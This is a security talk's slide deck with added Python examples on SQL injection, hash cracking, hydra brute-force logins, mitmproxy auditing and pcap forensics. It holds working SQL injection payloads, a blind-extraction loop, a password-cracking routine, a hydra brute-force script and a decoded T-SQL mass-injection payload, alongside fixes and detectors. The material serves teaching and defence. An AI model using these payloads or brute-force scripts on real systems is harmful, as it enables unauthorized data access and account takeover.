Slide 1

Python for Application Security Testing
Zaki Akhmad, PyCon APAC 2014, May 18, 2014

Slide 2

hen gao xing ren shi ni (pinyin; Chinese for "nice to meet you")

Slide 3

About Me

Slide 4

Zaki Akhmad, @zakiakhmad

Slide 5

Python Indonesia Meetup Organizer
Planet Python Indonesia Maintainer

Slide 6

Security Analyst

Slide 7

This talk won't be a rocket-science talk

Slide 8

Heartbleed

Slide 9


Slide 10


Slide 11

Python script to test for the Heartbleed vulnerability: https://github.com/musalbas/heartbleed-masstest

Slide 12

Detect and Exploit SQL Injection

Slide 13

Exploits of a Mom, XKCD #327

Slide 14

#1. Injection (A1 in the OWASP Top 10 of 2013)

Slide 15

"SQL Injection is (mostly) about the unauthorized DBMS data access."
Miroslav Stampar, sqlmap developer

Slide 16

SQL injection techniques (the ones sqlmap automates):
Boolean-based blind
Error-based
Union query-based (partial and full)
Time-based blind
Stacked queries
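An added example (not from the talk or from sqlmap) that shows two of the techniques above against an in-memory SQLite database: a union query that pulls rows from a table the original statement never named, and boolean-based blind extraction, which recovers a hidden column one character at a time from nothing but the presence or absence of a result row. The `users` and `secrets` tables and their contents are constructed for the example; the parameterized `safe_lookup` beside the vulnerable `vulnerable_lookup` is what the fix looks like.

```python
#!/usr/bin/env python3
# Added example (not from the talk): an injectable query beside its parameterized fix,
# exercised with a union payload and a boolean-based blind extraction loop.
import sqlite3
import string

CHARSET = string.ascii_lowercase + string.digits + "-"  # alphabet the blind loop tries

def make_db():
    """Constructed sample data: a users table and a secrets table the app never queries."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        CREATE TABLE secrets(id INTEGER PRIMARY KEY, flag TEXT);
        INSERT INTO users(name, password) VALUES ('admin', 'c0rrect-h0rse'), ('bob', 'hunter2');
        INSERT INTO secrets(flag) VALUES ('DB-ONLY-DATA');
    """)
    return db

def vulnerable_lookup(db, name):
    """Vulnerable on purpose: user input is pasted into the SQL text."""
    sql = "SELECT name, password FROM users WHERE name = '%s'" % name
    return db.execute(sql).fetchall()

def safe_lookup(db, name):
    """Fixed version: the value travels as a bound parameter and can never become SQL."""
    return db.execute("SELECT name, password FROM users WHERE name = ?", (name,)).fetchall()

# Union technique: the attacker closes the string, appends a SELECT with the same column
# count from another table, and comments out the rest of the original statement.
UNION_PAYLOAD = "x' UNION SELECT flag, '' FROM secrets--"

def blind_extract(oracle, column, row_filter, charset=CHARSET, maxlen=32):
    """Boolean-based blind extraction. The app never displays `column`, but it does reveal
    whether a row came back; that single bit per query is enough to read the value out
    character by character, which is what sqlmap's blind technique automates."""
    found = ""
    for pos in range(1, maxlen + 1):  # SQLite substr() is 1-indexed
        for ch in charset:
            if oracle("%s' AND substr(%s,%d,1)='%s'--" % (row_filter, column, pos, ch)):
                found += ch
                break
        else:
            break  # no character matched: we have reached the end of the value
    return found

if __name__ == "__main__":
    db = make_db()
    print("union  :", vulnerable_lookup(db, UNION_PAYLOAD))  # rows from a table the query never named
    print("fixed  :", safe_lookup(db, UNION_PAYLOAD))        # [] -- the payload is just an odd username
    oracle = lambda payload: bool(vulnerable_lookup(db, payload))
    print("blind  :", blind_extract(oracle, "password", "admin"))
```

The blind loop needs roughly (alphabet size × value length) requests, which is why the time-based and stacked variants matter when a boolean oracle is not visible in the response: a delay or a second statement becomes the oracle instead.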

Slide 17

sqlmap - project statistics: http://www.ohloh.net/p/sqlmap

Slide 18

Dump DBMS database table entries

Slide 19

Contribution

Feature requests:
  Configure output directory
  Retrieve database server IP address
  Add Indonesian common-columns
Bug:
  [CRITICAL] unhandled exception

Slide 20

Identify Hash Algorithm

Slide 21

If you find hashed passwords made of the characters a-f and 0-9 with length 32, they might be MD5. (A 32-hex-digit string is any 128-bit digest, so MD4 and NTLM look identical; the shape only narrows the candidates, and only cracking one confirms the guess.)

Slide 22

hash-identifier: a Python script to identify the hash algorithm from the digest's shape

Slide 23

We need to know the hash algorithm to crack it.
Security is only as strong as the weakest link,
and the most frequent weakest link is the password.

Slide 24

hashcat: advanced password recovery

$ ./hashcat-cli64.bin --help   (hashcat 0.47)
hashcat, advanced password recovery

Usage: hashcat [options] hashfile [mask|wordfiles|directories]
...
Hash type
    0 = MD5
   10 = md5($pass.$salt)
   50 = HMAC-MD5 (key = $pass)
  100 = SHA1
  200 = MySQL
  400 = phpass, MD5(Wordpress), MD5(phpBB3)
  500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
  800 = SHA-1(Django)
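Slides 21 to 24 put together as an added example (not the hash-identifier tool): a 32-hex-digit string only tells you the digest is 128 bits wide, so the code keeps every algorithm of that width as a candidate and lets a dictionary run over all of them decide which one it really is. `CANDIDATES`, the five-word `WORDLIST` and the file names in `hashcat_command` are constructed for the example; `HASHCAT_MODE` carries hashcat's `-m` numbers for the unsalted modes (0 and 100 appear in the --help excerpt above, the others come from the same table).

```python
#!/usr/bin/env python3
# Added example (not the hash-identifier tool): identify candidates by digest shape, then
# let a dictionary run decide which candidate is right.
import hashlib
import re

# A hex digest only reveals its width; every algorithm of that width stays a candidate.
CANDIDATES = {
    32: ["md5", "md4", "ntlm"],   # 128-bit: what slide 21 calls "a-f,0-9 and length 32"
    40: ["sha1", "ripemd160"],    # 160-bit
    64: ["sha256", "sha3_256"],   # 256-bit
    128: ["sha512"],              # 512-bit
}
# hashcat -m numbers for the unsalted modes (0 and 100 are in the --help excerpt above)
HASHCAT_MODE = {"md5": 0, "md4": 900, "ntlm": 1000, "sha1": 100, "sha256": 1400, "sha512": 1700}
WORDLIST = ["123456", "password", "admin", "letmein", "qwerty"]  # constructed stand-in for rockyou.txt

def identify(digest):
    """Candidate algorithms for a hex digest, most common first; [] if it is not hex at all."""
    if not re.fullmatch(r"[0-9a-fA-F]+", digest):
        return []
    return CANDIDATES.get(len(digest), [])

def compute(algo, password):
    """Hex digest of password under algo, or None when this OpenSSL build lacks it (md4 often does)."""
    try:
        if algo == "ntlm":  # NTLM is MD4 over the UTF-16LE encoding of the password
            return hashlib.new("md4", password.encode("utf-16-le")).hexdigest()
        return hashlib.new(algo, password.encode()).hexdigest()
    except ValueError:
        return None

def crack(digest, wordlist=WORDLIST):
    """Dictionary attack over every candidate algorithm; returns (algo, word) or None."""
    digest = digest.lower()
    for algo in identify(digest):
        for word in wordlist:
            if compute(algo, word) == digest:
                return algo, word
    return None

def hashcat_command(digest, hashfile="hashes.txt", wordlist_path="rockyou.txt"):
    """Equivalent hashcat invocation for the most likely candidate (None if the width is unknown)."""
    for algo in identify(digest):
        if algo in HASHCAT_MODE:
            return "hashcat -m %d %s %s" % (HASHCAT_MODE[algo], hashfile, wordlist_path)
    return None

if __name__ == "__main__":
    for word in ("letmein", "qwerty"):
        for algo in ("md5", "sha1"):
            digest = compute(algo, word)
            print(digest, identify(digest), crack(digest), hashcat_command(digest))
```

Salted and iterated formats (the md5($pass.$salt), phpass and md5crypt rows in the excerpt) are not plain hex digests and usually carry a recognisable prefix such as `$1$` or `$P$`, so they are identified by prefix rather than by length.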

Slide 25

hydra: a very fast network logon cracker
dictionary attack: trying to log in with the words of a dictionary (wordlist)
Python script to run hydra over multiple dictionary files (wordlists)

Slide 26

hydra-multiple-wordlist.py

#!/usr/bin/env python
# Run hydra once per wordlist file found in a directory. The unused "import threading"
# from the slide is dropped: the runs are sequential, one hydra process at a time.
import os
from subprocess import call


def listdir_fullpath(d):
    return [os.path.join(d, f) for f in os.listdir(d)]


def main():
    wordlists = listdir_fullpath("/home/za/tools/wordlist")
    for wordlist in wordlists:
        print("in progress using %s wordlist" % wordlist)
        # -l admin: single username; -P: password list; then target host and service;
        # -v: verbose; -t 128: parallel connections per target
        call(["hydra", "-l", "admin", "-P", wordlist,
              "192.168.99.66", "mssql", "-v", "-t", "128"])
        print("done")


if __name__ == "__main__":
    main()

Slide 27

Proxy - Network Traffic

Slide 28

web browser - proxy - server
mobile apps - proxy - server

Slide 29

mitmproxy: a man-in-the-middle proxy to intercept, modify, replay and save HTTP/S traffic

Slide 30

mitmproxy analyzing an HTTPS connection

Slide 31

mitmproxy analyzing a POST request
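What analyzing POST requests looks like once it is scripted, as an added example that is not part of the talk: a mitmproxy script whose `request` hook inspects every proxied POST, lists the form or JSON field names and flags credential-looking fields, noting when they travel over plain HTTP. The hook uses the current mitmproxy addon attributes (`flow.request.method`, `.pretty_url`, `.headers`, `.content`), which is an assumption about the mitmproxy version; the 2014 release used `def request(context, flow)`. The `SENSITIVE` names and the stand-in flow under `__main__` are constructed.

```python
#!/usr/bin/env python3
# post_audit.py: added example of a mitmproxy script (not from the talk). Run it with
#     mitmproxy -s post_audit.py
# and point the browser or phone at the proxy as on the slide before.
import json
from urllib.parse import parse_qs

SENSITIVE = {"password", "passwd", "pass", "pwd", "token", "secret", "otp"}  # constructed list

def summarize_request(method, url, content_type, body):
    """Describe one request: its field names and which of them look like credentials.
    Returns None for anything but POST (a GET's parameters are already visible in the URL)."""
    if method != "POST":
        return None
    if content_type.startswith("application/x-www-form-urlencoded"):
        fields = parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True)
    elif content_type.startswith("application/json"):
        try:
            fields = json.loads(body)
        except ValueError:  # malformed JSON: still worth logging, just without field names
            fields = {}
    else:
        fields = {}
    names = sorted(fields) if isinstance(fields, dict) else []
    return {
        "url": url,
        "fields": names,
        "sensitive": [n for n in names if n.lower() in SENSITIVE],
        "cleartext": url.startswith("http://"),  # credentials over plain HTTP: the usual finding
    }

def request(flow):
    """mitmproxy event hook, called once per client request passing through the proxy.
    Assumes the current addon API (flow.request.method / pretty_url / headers / content)."""
    req = flow.request
    info = summarize_request(req.method, req.pretty_url,
                             req.headers.get("content-type", ""), req.content or b"")
    if info and info["sensitive"]:
        print("[post_audit] %s sends %s%s" % (info["url"], ",".join(info["sensitive"]),
                                             " over CLEARTEXT HTTP" if info["cleartext"] else ""))

if __name__ == "__main__":  # offline demo with a constructed stand-in for a mitmproxy flow
    class _Req:
        method, pretty_url = "POST", "http://app.test/login"
        headers = {"content-type": "application/x-www-form-urlencoded"}
        content = b"user=admin&password=hunter2"

    class _Flow:
        request = _Req()

    request(_Flow())
```

For HTTPS the same hook sees the decrypted request because the client trusts mitmproxy's CA certificate; a mobile app that pins its server certificate will refuse the connection instead, which is itself a useful finding.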

Slide 32

Network Forensics

Slide 33

Client: "We have deployed a (network) firewall but we still got attacked by SQL injection."
(A network firewall filters on addresses and ports; the injection arrives inside ordinary HTTP requests on port 80, which the firewall has to allow.)
Starting the forensics by capturing all network traffic

Slide 34

sqlinject-finder: a script that parses through a pcap and looks for common SQL injection characteristics

Slide 35

sqlinject-finder

Capturing the traffic to analyse:

# tcpdump -i eth0 port 80 -s0 -G 3600 -w packet_%Y%m%d.%H%M.pcap

-i eth0: capture on the web server's interface; port 80: HTTP only; -s0: whole packets, not just headers; -G 3600 together with the strftime-style -w name: start a fresh, timestamped file every hour. Only plaintext HTTP is captured and readable this way; traffic on 443 is both outside the filter and encrypted.

Slide 36

sqlinject-finder

$ python sqlinject-finder.py -f packet_20140518.1530.pcap

Source : xxx.80.8.88
Page   : /transfertoasp.aspx
Value  : id=143) declar @s varchar(4000) i set @s=cast(0x20736557420616e7369....
Frame  : 52653
Reason : Possible use of SQL syntax in variable

Slide 37

sqlinject-finder

The real statement is hidden in the hex literal passed to cast(0x...); we need to decode it.

Slide 38

sqlinject-finder

Decoding the hex literal with the standard library (the slide shows only the call; the argument is the hex digits after "0x"):

#!/usr/bin/python
import binascii
import sys

# usage: decode.py <hex digits>   e.g. the digits following 0x in the captured value
print(binascii.unhexlify(sys.argv[1]))

Slide 39

sqlinject-finder

Decoded packet: a cursor over every text column of every base table, rewriting each through EXEC(UPDATE ...); the injected string is cut off on the slide.

set ansi_warnings off
DECLARE @T VARCHAR(255), @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
  select c.TABLE_NAME, c.COLUMN_NAME
  from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
  where c.DATA_TYPE in ('nvarchar', 'varchar', 'ntext', 'text')
    and c.CHARACTER_MAXIMUM_LENGTH > 30
    and t.table_name = c.table_name
    and t.table_type = 'BASE TABLE'
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
  EXEC('UPDATE [' + @T + '] SET [' + @C + '] = ''">
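The whole chain from slides 34 to 39 as one added example, in plain Python rather than the sqlinject-finder script: parse the pcap that tcpdump wrote, extract the HTTP request parameters from each TCP segment, flag values that look like SQL, and unhexlify the `0x...` literal in which the T-SQL `cast(0x... as varchar(4000)) exec(@s)` trick hides the real statement. The capture is constructed inside `sample_pcap()` (one clean request, one hex-wrapped injection modelled on the one above, one tautology); the IPs, paths and detection patterns are assumptions for the example, not data from the engagement.

```python
#!/usr/bin/env python3
# Added example, not the sqlinject-finder script itself: walk a classic pcap by hand, pull the
# HTTP request parameters out of each TCP segment, flag SQL-looking values, and decode the
# 0x... literals that T-SQL attacks such as the one above use to hide the real statement.
import binascii
import re
import socket
import struct
from urllib.parse import unquote_plus

SQLI_PATTERNS = [
    (re.compile(r"\bdeclare\s+@\w+", re.I), "T-SQL variable declaration"),
    (re.compile(r"\bexec\s*\(", re.I), "EXEC() of a built string"),
    (re.compile(r"\bcast\s*\(\s*0x[0-9a-f]+", re.I), "hex-encoded string passed to CAST"),
    (re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I), "UNION SELECT"),
    (re.compile(r"'\s*(?:or|and)\s+[\w']+\s*=", re.I), "quote followed by a boolean condition"),
]

def iter_pcap_frames(data):
    """Yield the link-layer frames of a classic (libpcap, not pcapng) capture file."""
    endian = {0xa1b2c3d4: "<", 0xd4c3b2a1: ">"}[struct.unpack("<I", data[:4])[0]]  # KeyError: not pcap
    off = 24  # global header: magic, version, tz offset, sigfigs, snaplen, linktype
    while off + 16 <= len(data):
        incl_len = struct.unpack(endian + "IIII", data[off:off + 16])[2]  # ts_sec, ts_usec, incl, orig
        off += 16
        yield data[off:off + incl_len]
        off += incl_len

def tcp_payload(frame):
    """(src_ip, dst_port, payload) for an Ethernet/IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:  # not IPv4, not TCP
        return None
    tcp = frame[14 + (frame[14] & 0x0f) * 4:]
    if len(tcp) < 20:
        return None
    return socket.inet_ntoa(frame[26:30]), struct.unpack("!H", tcp[2:4])[0], tcp[(tcp[12] >> 4) * 4:]

def http_params(payload):
    """(path, {param: value}) of an HTTP request, or None. Pairs are split on '&' only, so a ';'
    inside a T-SQL payload is not mistaken for a separator; a POST body is folded in as well."""
    text = payload.decode("latin-1")
    m = re.match(r"(GET|POST)\s+(\S+)\s+HTTP/1\.[01]\r\n", text)
    if not m:
        return None
    path, _, query = m.group(2).partition("?")
    if m.group(1) == "POST" and "\r\n\r\n" in text:
        query += "&" + text.split("\r\n\r\n", 1)[1]
    params = {}
    for pair in filter(None, query.split("&")):
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(value)
    return path, params

def decode_hex_literals(value):
    """Decode each 0x... literal; copes with a truncated (odd-length) literal and with UTF-16LE
    text, which attackers use when the target column is nvarchar."""
    out = []
    for h in re.findall(r"0x([0-9a-fA-F]+)", value):
        raw = binascii.unhexlify(h[:len(h) // 2 * 2])
        utf16 = len(raw) > 1 and not any(raw[1::2])
        out.append(raw.decode("utf-16-le" if utf16 else "latin-1", "replace"))
    return out

def find_sqli(pcap_bytes):
    """Run the patterns over every request parameter in the capture."""
    findings = []
    for frame_no, frame in enumerate(iter_pcap_frames(pcap_bytes), 1):
        seg = tcp_payload(frame)
        req = http_params(seg[2]) if seg else None
        if not req:
            continue
        for name, value in req[1].items():
            reasons = [why for rx, why in SQLI_PATTERNS if rx.search(value)]
            if reasons:
                findings.append({"frame": frame_no, "source": seg[0], "page": req[0], "param": name,
                                 "value": value, "reasons": reasons, "decoded": decode_hex_literals(value)})
    return findings

def http_get_frame(src_ip, dst_ip, target):
    """Constructed Ethernet/IPv4/TCP frame carrying one GET (checksums left zero; nothing checks them)."""
    payload = ("GET %s HTTP/1.1\r\nHost: victim.test\r\n\r\n" % target).encode()
    tcp = struct.pack("!HHIIBBHHH", 40000, 80, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip)) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip

def sample_pcap():
    """Constructed stand-in for the packet_*.pcap files tcpdump wrote: one clean request, one
    hex-wrapped T-SQL injection in the style shown above, one classic tautology."""
    hidden = binascii.hexlify(b"set ansi_warnings off").decode()
    frames = [
        http_get_frame("10.0.0.5", "10.0.0.80", "/transfer.aspx?id=143"),
        http_get_frame("203.0.113.8", "10.0.0.80", "/transfer.aspx?id=143;declare%20@s%20varchar(4000)"
                       "%20set%20@s=cast(0x" + hidden + "%20as%20varchar(4000))%20exec(@s)"),
        http_get_frame("203.0.113.9", "10.0.0.80", "/login.aspx?user=admin'%20or%20'1'='1"),
    ]
    out = struct.pack("<IHHiIII", 0xa1b2c3d4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1400000000 + i, 0, len(f), len(f)) + f
    return out

if __name__ == "__main__":
    print(find_sqli(sample_pcap()))
```

Two things this deliberately does not do, and a real capture will force: reassemble a request that spans several TCP segments, and read pcapng, which is what newer tcpdump and Wireshark builds write by default. Both are reasons to reach for scapy or dpkt once the logic above is understood.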

Slide 40

Wrap Up

Heartbleed
SQL injection
Hash algorithm
Proxy
Network forensics
... and many more!

Slide 41
